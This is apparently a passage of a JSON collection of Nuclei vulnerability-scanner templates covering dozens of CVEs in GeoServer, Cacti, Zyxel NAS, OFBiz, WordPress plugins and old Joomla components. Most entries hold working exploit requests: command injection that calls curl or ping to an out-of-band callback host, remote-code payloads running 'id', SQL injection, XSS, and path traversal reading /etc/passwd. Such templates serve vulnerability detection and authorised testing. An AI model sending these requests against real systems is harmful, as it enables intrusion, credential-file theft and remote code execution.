Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/file=https://oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-6587","info":{"name":"LiteLLM - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /chat/completions HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"model\": \"command-nightly\",\n  \"messages\": [\n    {\n      \"content\": \"Hello, how are you?\",\n      \"role\": \"user\"\n    }\n  ],\n  \"api_base\": \"https://{{interactsh-url}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["Bearer"]}]}]},{"id":"CVE-2024-36401","info":{"name":"GeoServer RCE in Evaluating Property Name Expressions","severity":"critical"},"requests":[{"raw":["GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"extractors":[{"type":"regex","name":"typename","part":"body","group":1,"regex":["typeName=([^&\\]]+)"],"internal":true}]},{"raw":["@timeout 20s\nGET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"content_type","words":["application/xml"]}]}]},{"id":"CVE-2024-29973","info":{"name":"Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - Command Injection","severity":"critical"},"requests":[{"raw":["POST /cmd,/simZysh/register_main/setCookie HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei\n\n------WebKitFormBoundarygcflwtei\nContent-Disposition: form-data; name=\"c0\"\n\nstorage_ext_cgi CGIGetExtStoInfo None) and False or __import__(\"subprocess\").check_output(\"echo {{string}}\", shell=True)#\n------WebKitFormBoundarygcflwtei--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'errmsg0\": \"OK')","contains(header, 'application/json')","contains(body, '{{string}}')"],"condition":"and"}]}]},{"id":"CVE-2024-39250","info":{"name":"EfroTech Timetrax v8.3 - Sql Injection","severity":"high"},"requests":[{"raw":["GET /Login.aspx HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"TimeTrax - Cloud HR Software\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /search.aspx?q=' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Incorrect syntax near\",\"Unclosed quotation mark after the character string\")","contains(content_type, \"text/html\")","status_code == 500"],"condition":"and"}]}]},{"id":"CVE-2024-40422","info":{"name":"Devika v1 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /api/data HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"models\",\"projects\",\"OPENAI\",\"OLLAMA\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-36527","info":{"name":"Puppeteer Renderer  - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html?url=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32113","info":{"name":"Apache OFBiz Directory Traversal - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["java.lang.Exception:","uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3136","info":{"name":"MasterStudy LMS <= 3.3.3 - Unauthenticated Local File Inclusion via template","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?template=../../../../../../../../usr/local/lib/php/pearcmd&+config-create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stm_lms_load_content&nonce={{nonce}}&\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_2),\"config-create: must have 2 parameters\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","regex":["\"load_content\":\"(\\w+?)\""],"group":1,"internal":true,"name":"nonce"}]}]},{"id":"CVE-2024-24763","info":{"name":"JumpServer < 3.10.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /{{paths}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n"],"payloads":{"paths":["core/auth/login/?next=//oast.me","auth/login/?next=//oast.me","login/?next=//oast.me"]},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2024-29972","info":{"name":"Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - NsaRescueAngel Backdoor Account","severity":"critical"},"requests":[{"raw":["GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'result=0')"],"condition":"and"}]}]},{"id":"CVE-2024-29895","info":{"name":"Cacti cmd_realtime.php - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23917","info":{"name":"JetBrains TeamCity > 2023.11.3 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code==200","contains(content_type,'application/xml')","contains(body,\"<token name=\\\"{{randstr}}\\\"\")"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","name":"authtoken","internal":true,"group":1,"regex":["value=\"(.+)\""]}]},{"method":"GET","path":["{{BaseURL}}/app/rest/server"],"headers":{"Authorization":"Bearer {{authtoken}}"},"extractors":[{"type":"dsl","dsl":["\"Token:\" + authtoken"]}],"matchers":[{"type":"dsl","dsl":["status_code==200","contains(content_type,'application/xml')","contains(body,'<projects href=')"],"condition":"and"}]}]},{"id":"CVE-2024-24112","info":{"name":"Exrick XMall - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}","MySQLSyntaxErrorException"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3274","info":{"name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/info.cgi HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Model=\", \"Build=\", \"Macaddr=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-28734","info":{"name":"Coda v.2024Q1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /coda/frameset?cols=\"><frame%20src=\"javascript:alert(document.domain)\"> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frameset cols=\"\"><frame src=\"javascript:alert(document.domain)\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6781","info":{"name":"Calibre <= 7.14.0 Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET /interface-data/books-init HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"book_ids","internal":true,"json":[".search_result.book_ids[0]"]}]},{"raw":["POST /cdb/cmd/export HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[\"extra_file\", {{book_ids}}, \"../../../../../etc/passwd\", \"\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"content_type","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\"result\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32651","info":{"name":"Change Detection - Server Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/"],"redirects":true,"max-redirects":2,"extractors":[{"type":"xpath","name":"version","internal":true,"xpath":["//*[@id=\"right-sticky\"]"]}],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","part":"body","words":["Change Detection"],"condition":"and"},{"type":"dsl","dsl":["compare_versions(version, '<= 0.45.20')"]}]}]},{"id":"CVE-2024-1021","info":{"name":"Rebuild <= 3.5.5 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<h1> Interactsh Server </h1>\")","!contains(body_1, \"<h1> Interactsh Server </h1>\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-36412","info":{"name":"SuiteCRM - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<\"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_any(body, \"You have already responded to the invitation or there\", \"Thank you for accepting\")"],"condition":"and"}]}]},{"id":"CVE-2024-4040","info":{"name":"CrushFTP VFS - Sandbox Escape LFR","severity":"critical"},"requests":[{"id":"unauth-exploit","raw":["GET /WebInterface/ HTTP/1.1\nHost: {{Hostname}}\n","POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["root:x:"]},{"type":"word","part":"header","words":["text/xml"]}],"extractors":[{"type":"regex","name":"auth","internal":true,"part":"header_1","group":1,"regex":["currentAuth=([0-9a-zA-Z]+)"]}]},{"id":"login","raw":["GET /WebInterface/ HTTP/1.1\nHost: {{Hostname}}\n","POST /WebInterface/function/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 111\nOrigin: {{RootURL}}\nReferer: http://{{RootURL}}/WebInterface/login.html\n\ncommand=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","internal":true,"words":["<response>success</response>"]},{"type":"word","part":"header_2","internal":true,"words":["text/xml"]}],"extractors":[{"type":"regex","name":"auth","internal":true,"part":"header_2","group":1,"regex":["currentAuth=([0-9a-zA-Z]+)"]}]},{"id":"auth-exploit","raw":["POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["root:x:"]}]}]},{"id":"CVE-2024-27348","info":{"name":"Apache HugeGraph-Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /gremlin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"gremlin\": \"Thread thread = Thread.currentThread();Class clz = Class.forName(\\\"java.lang.Thread\\\");java.lang.reflect.Field field = clz.getDeclaredField(\\\"name\\\");field.setAccessible(true);field.set(thread, \\\"SL7\\\");Class processBuilderClass = Class.forName(\\\"java.lang.ProcessBuilder\\\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\\\"ping\\\", \\\"{{interactsh-url}}\\\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\\\"start\\\");startMethod.invoke(processBuilderInstance);\", \"bindings\": {}, \"language\": \"gremlin-groovy\", \"aliases\": {}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"application/json\")","contains(body, \"inputStream\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2024-36837","info":{"name":"CRMEB v.5.2.2 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}","SQLSTATE"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6911","info":{"name":"PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /ProcessPlus HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>Process Plus - Perten Instruments</title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /ProcessPlus/Log/Download/?filename=..\\..\\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","contains(content_type, \"text/plain\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-33724","info":{"name":"SOPlanning 1.52.00 Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /process/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}\n","GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"attack":"pitchfork","payloads":{"username":["admin"],"password":["admin"]},"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains_all(body_2, \"<script>alert(document.domain)</script>\", \"SOPlanning\")"],"condition":"and"}]}]},{"id":"CVE-2024-25600","info":{"name":"Unauthenticated Remote Code Execution \u2013 Bricks <= 1.9.6","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-json/bricks/v1/render_element HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"postId\": \"1\",\n  \"nonce\": \"{{nonce}}\",\n  \"element\": {\n    \"name\": \"container\",\n    \"settings\": {\n      \"hasLoop\": \"true\",\n      \"query\": {\n        \"useQueryEditor\": true,\n        \"queryEditor\": \"ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);\",\n        \"objectType\": \"post\"\n      }\n    }\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Exception:","uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true}]}]},{"id":"CVE-2024-2340","info":{"name":"Avada < 7.11.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/fusion-forms/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<title>Index of [\\s\\S]*title>","fusion"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1208","info":{"name":"LearnDash LMS < 4.10.3 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sfwd-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"question_type\":","\"points_total\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31851","info":{"name":"CData Sync < 23.4.8843 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData - Sync"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4434","info":{"name":"LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout 20s\nPOST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2 >= 6","status_code_2 == 200","contains(content_type,\"application/json\")","contains_all(body_2,\"No courses were found\",\"success\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"is_course_archive\""],"internal":true}]}]},{"id":"CVE-2024-5420","info":{"name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /device/description_en.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\u201c><script>alert(document.domain)</script>\" id=\"standort\"","Host name</label>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6396","info":{"name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","severity":"critical"},"requests":[{"raw":["POST /tracking/client_1/get-resource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"resource_handler\": \"my_resource\",\n\"resource_type\": \"Repo\",\n\"args\": \"AAAAAAABAAAABw==\"\n}\n","POST /tracking/client_1/read-instruction HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"resource_handler\": \"my_resource\",\n\"method_name\": \"_backup_run\",\n\"args\": \"{{base64(args)}}\"\n}\n","@Host: http://{{Host}}:43800\nGET /static-files/{{filename}}.txt HTTP/1.1\nHost: {{Host}}:43800\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"handler\":\"my_resource\"}"]},{"type":"word","part":"body_3","words":["{{filename}}.txt"]},{"type":"word","part":"header_3","words":["text/plain"]}]}]},{"id":"CVE-2024-6922","info":{"name":"Automation Anywhere Automation 360 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /v1/proxy/test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"saasUrl\":\"{{interactsh-url}}/?param=one#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"message\":"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2010-1870","info":{"name":"ListSERV Maestro <= 9.0-8 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lui/","{{BaseURL}}/hub/"],"extractors":[{"type":"regex","regex":["LISTSERV Maestro\\s+9\\.0-[123456780]","LISTSERV Maestro\\s+[5678]","Administration Hub 9\\.0-[123456780]","Administration Hub [5678]"]}]}]},{"id":"CVE-2010-0985","info":{"name":"Joomla! Component com_abbrev - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1475","info":{"name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4719","info":{"name":"Joomla! Component JRadio - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2034","info":{"name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0982","info":{"name":"Joomla! Component com_cartweberp - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5028","info":{"name":"Joomla! Component JE Job 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2918","info":{"name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1461","info":{"name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1982","info":{"name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2682","info":{"name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5286","info":{"name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2045","info":{"name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0759","info":{"name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1719","info":{"name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3426","info":{"name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1531","info":{"name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1534","info":{"name":"Joomla! Component Shoutbox Pro - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1217","info":{"name":"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1601","info":{"name":"Joomla! Component JA Comment - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0944","info":{"name":"Joomla! Component com_jcollection - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1315","info":{"name":"Joomla! Component webERPcustomer - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1977","info":{"name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1878","info":{"name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1081","info":{"name":"Joomla! Component com_communitypolls 1.5.2 - Local File 